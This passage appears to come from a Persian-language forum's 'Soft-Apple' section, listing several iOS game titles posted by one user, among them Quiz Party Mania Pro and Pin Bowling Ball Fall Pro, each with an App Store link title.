    بازی Quiz Party Mania Pro - cool brain twister A1 Quiz Party Mania Pro - cool brain twister on the App Store
  23. mohammad_ghazei

    Soft-Apple

    بازی Pin Bowling Ball Fall Pro A1 Pin Bowling Ball Fall Pro on the App Store
  24. mohammad_ghazei

    Soft-Apple

    بازی Party Slushie Maker Mania Pro - best virtual drink making game A1 Party Slushie Maker Mania Pro - best virtual drink making game on the App Store
  25. mohammad_ghazei

    Soft-Apple

    بازی A.L.E.X. PRO A.L.E.X. PRO on the App Store